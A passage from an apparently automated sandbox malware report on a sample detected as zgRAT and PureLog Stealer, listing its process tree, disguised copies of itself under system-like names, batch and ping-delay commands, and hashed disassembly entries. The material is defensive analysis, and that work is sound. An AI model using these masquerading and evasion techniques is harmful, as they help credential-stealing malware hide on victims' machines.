                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\SgrmBroker.exe, Author: Joe Security
                                                                                    Antivirus matches:
                                                                                    • Detection: 100%, Avira
                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                    • Detection: 63%, ReversingLabs
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:37
                                                                                    Start time:10:20:03
                                                                                    Start date:11/01/2025
                                                                                    Path:C:\Recovery\SgrmBroker.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Recovery\SgrmBroker.exe
                                                                                    Imagebase:0xc30000
                                                                                    File size:2'020'864 bytes
                                                                                    MD5 hash:6B9554367A439D39A00A0DFF9A08B123
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:38
                                                                                    Start time:10:20:03
                                                                                    Start date:11/01/2025
                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\BUc8lPV5KF.bat"
                                                                                    Imagebase:0x7ff640170000
                                                                                    File size:289'792 bytes
                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:39
                                                                                    Start time:10:20:03
                                                                                    Start date:11/01/2025
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:40
                                                                                    Start time:10:20:03
                                                                                    Start date:11/01/2025
                                                                                    Path:C:\Program Files\Adobe\StartMenuExperienceHost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Program Files\Adobe\StartMenuExperienceHost.exe"
                                                                                    Imagebase:0x950000
                                                                                    File size:2'020'864 bytes
                                                                                    MD5 hash:6B9554367A439D39A00A0DFF9A08B123
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Adobe\StartMenuExperienceHost.exe, Author: Joe Security
                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Adobe\StartMenuExperienceHost.exe, Author: Joe Security
                                                                                    Antivirus matches:
                                                                                    • Detection: 100%, Avira
                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                    • Detection: 63%, ReversingLabs
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:41
                                                                                    Start time:10:20:03
                                                                                    Start date:11/01/2025
                                                                                    Path:C:\Program Files\Adobe\StartMenuExperienceHost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Program Files\Adobe\StartMenuExperienceHost.exe"
                                                                                    Imagebase:0xc40000
                                                                                    File size:2'020'864 bytes
                                                                                    MD5 hash:6B9554367A439D39A00A0DFF9A08B123
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:42
                                                                                    Start time:10:20:03
                                                                                    Start date:11/01/2025
                                                                                    Path:C:\Recovery\SystemSettings.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Recovery\SystemSettings.exe
                                                                                    Imagebase:0x820000
                                                                                    File size:2'020'864 bytes
                                                                                    MD5 hash:6B9554367A439D39A00A0DFF9A08B123
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\SystemSettings.exe, Author: Joe Security
                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\SystemSettings.exe, Author: Joe Security
                                                                                    Antivirus matches:
                                                                                    • Detection: 100%, Avira
                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                    • Detection: 63%, ReversingLabs
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:43
                                                                                    Start time:10:20:03
                                                                                    Start date:11/01/2025
                                                                                    Path:C:\Recovery\SystemSettings.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Recovery\SystemSettings.exe
                                                                                    Imagebase:0xd40000
                                                                                    File size:2'020'864 bytes
                                                                                    MD5 hash:6B9554367A439D39A00A0DFF9A08B123
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:44
                                                                                    Start time:10:20:03
                                                                                    Start date:11/01/2025
                                                                                    Path:C:\Windows\System32\chcp.com
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:chcp 65001
                                                                                    Imagebase:0x7ff6a0070000
                                                                                    File size:14'848 bytes
                                                                                    MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:45
                                                                                    Start time:10:20:03
                                                                                    Start date:11/01/2025
                                                                                    Path:C:\Users\user\Desktop\WinPerfcommon.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Users\user\Desktop\WinPerfcommon.exe
                                                                                    Imagebase:0x3c0000
                                                                                    File size:2'020'864 bytes
                                                                                    MD5 hash:6B9554367A439D39A00A0DFF9A08B123
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:46
                                                                                    Start time:10:20:04
                                                                                    Start date:11/01/2025
                                                                                    Path:C:\Windows\System32\w32tm.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                    Imagebase:0x7ff72b240000
                                                                                    File size:108'032 bytes
                                                                                    MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:47
                                                                                    Start time:10:20:06
                                                                                    Start date:11/01/2025
                                                                                    Path:C:\Users\user\Desktop\WinPerfcommon.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Users\user\Desktop\WinPerfcommon.exe
                                                                                    Imagebase:0xdf0000
                                                                                    File size:2'020'864 bytes
                                                                                    MD5 hash:6B9554367A439D39A00A0DFF9A08B123
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:48
                                                                                    Start time:10:20:09
                                                                                    Start date:11/01/2025
                                                                                    Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                    Imagebase:0x7ff693ab0000
                                                                                    File size:496'640 bytes
                                                                                    MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:49
                                                                                    Start time:10:20:09
                                                                                    Start date:11/01/2025
                                                                                    Path:C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe"
                                                                                    Imagebase:0xc30000
                                                                                    File size:2'020'864 bytes
                                                                                    MD5 hash:6B9554367A439D39A00A0DFF9A08B123
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:50
                                                                                    Start time:10:20:12
                                                                                    Start date:11/01/2025
                                                                                    Path:C:\Program Files\Adobe\StartMenuExperienceHost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Program Files\Adobe\StartMenuExperienceHost.exe"
                                                                                    Imagebase:0x9c0000
                                                                                    File size:2'020'864 bytes
                                                                                    MD5 hash:6B9554367A439D39A00A0DFF9A08B123
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:51
                                                                                    Start time:10:20:13
                                                                                    Start date:11/01/2025
                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\bCL7Nxg3GW.bat"
                                                                                    Imagebase:0x7ff640170000
                                                                                    File size:289'792 bytes
                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:52
                                                                                    Start time:10:20:13
                                                                                    Start date:11/01/2025
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:53
                                                                                    Start time:10:20:13
                                                                                    Start date:11/01/2025
                                                                                    Path:C:\Windows\System32\chcp.com
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:chcp 65001
                                                                                    Imagebase:0x7ff6a0070000
                                                                                    File size:14'848 bytes
                                                                                    MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:54
                                                                                    Start time:10:20:13
                                                                                    Start date:11/01/2025
                                                                                    Path:C:\Windows\System32\PING.EXE
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:ping -n 10 localhost
                                                                                    Imagebase:0x7ff69f250000
                                                                                    File size:22'528 bytes
                                                                                    MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Disassembly

                                                                                    Reset < >

                                                                                      Executed Functions

                                                                                      Function 00007FFD9B800D48 Relevance: 1.5, Strings: 1, Instructions: 260COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1817243924.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b800000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 5X_H
                                                                                      • API String ID: 0-3241812158
                                                                                      • Opcode ID: a9b198a3129d4e03689222bf082263645a5cfe498ea5bc612d19547e2ad5b5e0
                                                                                      • Instruction ID: 8b5d17cd29e78b16777fb91e38361f74131b981968f282e0e977d4d0f31b24ab
                                                                                      • Opcode Fuzzy Hash: a9b198a3129d4e03689222bf082263645a5cfe498ea5bc612d19547e2ad5b5e0
                                                                                      • Instruction Fuzzy Hash: 6291BE75A29A8E4FE759DF6C8865BF87FE0EF9A310F0101BED049D72E6DA7818118740
                                                                                      Function 00007FFD9B800E43 Relevance: .2, Instructions: 171COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1817243924.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b800000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: acc977649e782da8704b1d6c3f12aeeff76a1e61003ac37f3486a4f18a8cd29b
                                                                                      • Instruction ID: d9e1638b7d94809236e4a8dc4b426bad31b2f399d47d80f7ed0403fda45b3cdd
                                                                                      • Opcode Fuzzy Hash: acc977649e782da8704b1d6c3f12aeeff76a1e61003ac37f3486a4f18a8cd29b
                                                                                      • Instruction Fuzzy Hash: 0551D276A28A8E8EE758CF6C84A5BFC7FE0EB9A354F5001BED049D63D5DBB914118340
                                                                                      Function 00007FFD9B800B3F Relevance: 3.8, Strings: 3, Instructions: 50COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1817243924.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b800000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: c9$!k9$"s9
                                                                                      • API String ID: 0-3426396564
                                                                                      • Opcode ID: 563c74ca737d2503fe2dad733225739fee968199f9910b104847e2c06a0d5736
                                                                                      • Instruction ID: b7b2fd8a8326811c29516b8ba0701dd8e93976923d491ff017ab74a88e02f7ee
                                                                                      • Opcode Fuzzy Hash: 563c74ca737d2503fe2dad733225739fee968199f9910b104847e2c06a0d5736
                                                                                      • Instruction Fuzzy Hash: E0F07822329D4A8BC7016B7DF8500E47B40EB8B172BE501BBD044CB262E211182EC3D1
                                                                                      Function 00007FFD9BC1C9DB Relevance: 2.7, Strings: 2, Instructions: 227COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: U$U
                                                                                      • API String ID: 0-2145350036
                                                                                      • Opcode ID: c004cc232ee63f677e2a1fc9c9ac3d3cd815531d4018e2217fb592aed58fa309
                                                                                      • Instruction ID: 293aa643d620fc389cae274dd6c1ab3026d56790f800c5046102c92d0beb737a
                                                                                      • Opcode Fuzzy Hash: c004cc232ee63f677e2a1fc9c9ac3d3cd815531d4018e2217fb592aed58fa309
                                                                                      • Instruction Fuzzy Hash: D671C430F1E54E8EEB65DBB488A46BE7BA0EF45301F1501BAE01EEB1E5DE386941C701
                                                                                      Function 00007FFD9BC14348 Relevance: 2.7, Strings: 2, Instructions: 157COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $W
                                                                                      • API String ID: 0-3287005699
                                                                                      • Opcode ID: 872b2076f8090c5520a2f262406781ba4754811f3708307cfdab87460461e2a7
                                                                                      • Instruction ID: bff66b623d1e410de9726b1b7514b9273417cba5718e334c2c8dae80c7a4e83d
                                                                                      • Opcode Fuzzy Hash: 872b2076f8090c5520a2f262406781ba4754811f3708307cfdab87460461e2a7
                                                                                      • Instruction Fuzzy Hash: 41516D71E0964E9FDB68DBA8C4605FDB7B1FF4A300F5141BED01AE7296CA382A41CB50
                                                                                      Function 00007FFD9BC1EC78 Relevance: 2.7, Strings: 2, Instructions: 152COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $W
                                                                                      • API String ID: 0-3287005699
                                                                                      • Opcode ID: cc2c241b174900b8bb33ef52bb54a46801af6613f90e138fd6bd1c30f1f0de4a
                                                                                      • Instruction ID: eb7da9b5ae2b5614275ffd151bf2c537ee69a4a23b0ac6ac21c2e21d623cfb7a
                                                                                      • Opcode Fuzzy Hash: cc2c241b174900b8bb33ef52bb54a46801af6613f90e138fd6bd1c30f1f0de4a
                                                                                      • Instruction Fuzzy Hash: 88515C31E0964F8FDB59DBA8C8645FDB7B1FF44300F5540BAD05AE7296CA386A01CB40
                                                                                      Function 00007FFD9BC145B5 Relevance: 1.7, Strings: 1, Instructions: 427COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: U
                                                                                      • API String ID: 0-3372436214
                                                                                      • Opcode ID: 705fd0df7c361d7660c7193fc065fd84bc3bd290713357cb9cea9844f0ccf67b
                                                                                      • Instruction ID: f2c106e6ed4f58dab50ff12d0a85b1c7bfb39b7a81d4d77ca04d7722d5f82108
                                                                                      • Opcode Fuzzy Hash: 705fd0df7c361d7660c7193fc065fd84bc3bd290713357cb9cea9844f0ccf67b
                                                                                      • Instruction Fuzzy Hash: 83F1E6306195599FEB68CF68C4E05B837A1FF46310F5551BDC85ECB69ACA38F981CB80
                                                                                      Function 00007FFD9BC1AC71 Relevance: 1.7, Strings: 1, Instructions: 416COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: W
                                                                                      • API String ID: 0-655174618
                                                                                      • Opcode ID: 5a23a14a61dbeb60bd1e9354ec2dd6369f90e63092ecfcf40ce8a8475f00cbcf
                                                                                      • Instruction ID: 89f98c5530d07ed60e3e962cf30bcd2dd0a593e903c306bc7c7b62f9e7302033
                                                                                      • Opcode Fuzzy Hash: 5a23a14a61dbeb60bd1e9354ec2dd6369f90e63092ecfcf40ce8a8475f00cbcf
                                                                                      • Instruction Fuzzy Hash: C8E10330A0EB0E8FD378DB78D4A457977E1FF44300B1155BED4AEC76A2DA29B9428741
                                                                                      Function 00007FFD9BC15601 Relevance: 1.6, Strings: 1, Instructions: 399COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: W
                                                                                      • API String ID: 0-655174618
                                                                                      • Opcode ID: 2f08a9dbb10c589ecad0e15e96bb5a456ba930447f34a9e624afd091bffc7018
                                                                                      • Instruction ID: e4352bd5ec2367a268578f714ef572b95f9532050372c8739b3b128d0a8d522e
                                                                                      • Opcode Fuzzy Hash: 2f08a9dbb10c589ecad0e15e96bb5a456ba930447f34a9e624afd091bffc7018
                                                                                      • Instruction Fuzzy Hash: 51D11030B1EB4A8FE378CB68D4A157977E0FF44310F1515BEC09AC76A2DA29B942C791
                                                                                      Function 00007FFD9BC1CBF0 Relevance: 1.6, Strings: 1, Instructions: 366COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: X_L
                                                                                      • API String ID: 0-1612919207
                                                                                      • Opcode ID: c97c72381eeef125d025b7a3854b8135b6164f4b1d4cb4b5a6d83c032da49cbf
                                                                                      • Instruction ID: ebae3dd219ecc34c9929491c23d830a3c5d0ce67e6b1c3e68a362ccf75593527
                                                                                      • Opcode Fuzzy Hash: c97c72381eeef125d025b7a3854b8135b6164f4b1d4cb4b5a6d83c032da49cbf
                                                                                      • Instruction Fuzzy Hash: BBC18130B18A1D8FDB58DF58C8999B9B3E2FF59315B1141A9D04EDB2A2DA31EC42CB40
                                                                                      Function 00007FFD9BC1EEEF Relevance: 1.6, Strings: 1, Instructions: 364COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: eneric
                                                                                      • API String ID: 0-4109413733
                                                                                      • Opcode ID: 372993eeeaf86d0ba4003864c3a883768c9f85140baacf37091a2192e84f0af0
                                                                                      • Instruction ID: d0fb203ba49f599b5d70098f1715fc368d4a8a80415137affe4f0cc7b2ff1fc5
                                                                                      • Opcode Fuzzy Hash: 372993eeeaf86d0ba4003864c3a883768c9f85140baacf37091a2192e84f0af0
                                                                                      • Instruction Fuzzy Hash: 5ED1D27061955A8FEB58CF68C0E05B837A1FF45301B5556BDC84BCB69BCA78F982CB80
                                                                                      Function 00007FFD9BC1EF0F Relevance: 1.6, Strings: 1, Instructions: 335COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: eneric
                                                                                      • API String ID: 0-4109413733
                                                                                      • Opcode ID: eb6025ed2e535db8e976075ac50e6974d6c8d290057f9e6cdf4c120b45f0e1c6
                                                                                      • Instruction ID: 784d6e0fef2085519030417a3b33cdc3e2c417d5982d2e333580055b5e84a066
                                                                                      • Opcode Fuzzy Hash: eb6025ed2e535db8e976075ac50e6974d6c8d290057f9e6cdf4c120b45f0e1c6
                                                                                      • Instruction Fuzzy Hash: CEC1C17061954A8FEB2DCF68C0E45B937A1FF45301B5555BDC88B8B69BCA38F982CB40
                                                                                      Function 00007FFD9BC1E7FA Relevance: 1.5, Strings: 1, Instructions: 283COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: U
                                                                                      • API String ID: 0-3372436214
                                                                                      • Opcode ID: 151730b40c7bced07d3a71074fedba34c9b7a26f80adbf2f111c75eb6008e9e6
                                                                                      • Instruction ID: e3a2c4748b4ce01b730e1a004adb9fc887d2771c6786fb615b968ef6e75d10f6
                                                                                      • Opcode Fuzzy Hash: 151730b40c7bced07d3a71074fedba34c9b7a26f80adbf2f111c75eb6008e9e6
                                                                                      • Instruction Fuzzy Hash: E0A1063070EA8B8FE759DF78C0A05A8BBA0FF55300F5551B9C04ECBA96DB28B951C791
                                                                                      Function 00007FFD9BC1C198 Relevance: 1.5, Strings: 1, Instructions: 282COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: W
                                                                                      • API String ID: 0-655174618
                                                                                      • Opcode ID: 5aa5fb40a630ae943499573f621e11c3e812da8645b2f46056ca10b5f77c9ac6
                                                                                      • Instruction ID: b08bfc02e5313200ec2f46a7d08f774d984086abf145e990e379d1be4c52fda2
                                                                                      • Opcode Fuzzy Hash: 5aa5fb40a630ae943499573f621e11c3e812da8645b2f46056ca10b5f77c9ac6
                                                                                      • Instruction Fuzzy Hash: 2C119D12F4F59B86F67552F814F01FE1A404F45322FAB25BAF44EAE1E6DC4C6A406282
                                                                                      Function 00007FFD9BC133A6 Relevance: 1.5, Strings: 1, Instructions: 265COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: W
                                                                                      • API String ID: 0-655174618
                                                                                      • Opcode ID: 4bf458c4722ceff9092b5ec2b0d8f52c3b23c7926f3643f846ef469c652211f7
                                                                                      • Instruction ID: 3737f6d3c70ee61f79b3a1370f1f4b8cff167d3cf91f5262a4243b689b7fd9f6
                                                                                      • Opcode Fuzzy Hash: 4bf458c4722ceff9092b5ec2b0d8f52c3b23c7926f3643f846ef469c652211f7
                                                                                      • Instruction Fuzzy Hash: C3817731B0E64A9FE3399A7894651797BE0EFC1314F1610BED48FD31A3DE28B9028752
                                                                                      Function 00007FFD9BC1B9A4 Relevance: 1.5, Strings: 1, Instructions: 212COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: U
                                                                                      • API String ID: 0-3372436214
                                                                                      • Opcode ID: 9e456d458c8755d0cb560982bfa2c691f94ade07f91313e0f1a8885985511e89
                                                                                      • Instruction ID: c236f8f4105bbc9d12553b4f7f914b0c5c9f64fb64bbc70f81326b0a2a47536a
                                                                                      • Opcode Fuzzy Hash: 9e456d458c8755d0cb560982bfa2c691f94ade07f91313e0f1a8885985511e89
                                                                                      • Instruction Fuzzy Hash: 1A61D831F1EA4E8FD768DB68C4609BDB7A1FF94300F5145BAD04EE71E6DE24A9018B41
                                                                                      Function 00007FFD9BC199B8 Relevance: 1.4, Strings: 1, Instructions: 155COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID: 0-3916222277
                                                                                      • Opcode ID: 1dd3db9a5fd2f27f40a37a2b0b6743c97641ed430c09f4147aa70869afb9d378
                                                                                      • Instruction ID: b0134853c410fa069eb90330db3f79b921712c3ef3eb65ee490fd1c9fa4c7bca
